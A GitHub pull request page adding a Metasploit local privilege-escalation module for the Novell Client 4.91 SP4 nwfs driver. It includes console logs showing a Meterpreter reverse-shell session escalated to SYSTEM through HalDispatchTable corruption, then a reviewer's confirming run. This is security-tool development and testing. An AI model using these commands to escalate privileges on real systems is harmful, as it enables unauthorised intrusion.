
Add module for OSVDB 46578 #2003

Merged (2 commits, Jun 22, 2013)

Conversation

jvazquez-r7
Contributor

Vulnerability in driver install with Novell Client 4.91 SP4. Tested successfully with Novell Client 4.91 SP4 on Windows XP SP3.

The software can be downloaded from: http://download.novell.com/Download?buildid=SyZ1G2ti7wU~

It's a local exploit. In order to test, the easiest way is to get an unprivileged session (with a payload embedded in an exe and exploits/multi/handler), and use the exploit to escalate the session to SYSTEM:

msf> use exploit/multi/handler 
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.245
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.245:1122) at 2013-06-21 17:24:03 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) > use exploit/windows/local/novell_client_nwfs 
msf exploit(novell_client_nwfs) > set session 2
session => 2
msf exploit(novell_client_nwfs) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.0.4:4444 
[*] Detecting the target system...
[*] "Windows XP (Build 2600, Service Pack 3)."
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\nwfs found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x3
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successfull!
[*] Storing the final payload on memory...
[+] Final payload successfully stored at 0xc0c0000
[*] Executing the payload...
[*] Sending stage (751104 bytes) to 192.168.0.4
[+] Enjoy!
[*] Meterpreter session 3 opened (192.168.0.4:4444 -> 192.168.0.4:60186) at 2013-06-21 17:24:34 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 3...
msf exploit(novell_client_nwfs) > sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  2   meterpreter x86/win32  JUAN-C0DE875735\Administrator @ JUAN-C0DE875735  192.168.172.1:4444 -> 192.168.172.245:1122 (192.168.172.245)
  3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ JUAN-C0DE875735            192.168.0.4:4444 -> 192.168.0.4:60186 (192.168.0.4)

msf exploit(novell_client_nwfs) > 

@wchen-r7
Contributor

Works for me, merging:

msf exploit(novell_client_nwfs) > exploit

[*] Started reverse handler on 10.0.1.76:4444 
[*] Detecting the target system...
[*] "Windows XP (Build 2600, Service Pack 3)."
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\nwfs found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x3
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Storing the final payload on memory...
[+] Final payload successfully stored at 0xc0c0000
[*] Executing the payload...
[*] Sending stage (751104 bytes) to 10.0.1.76
[+] Enjoy!
[*] Meterpreter session 2 opened (10.0.1.76:4444 -> 10.0.1.76:52099) at 2013-06-21 21:51:33 -0500

meterpreter > 

@wchen-r7 wchen-r7 merged commit f106b6d into rapid7:master Jun 22, 2013
@jvazquez-r7 jvazquez-r7 deleted the novell_client_nwfs branch November 18, 2014 15:53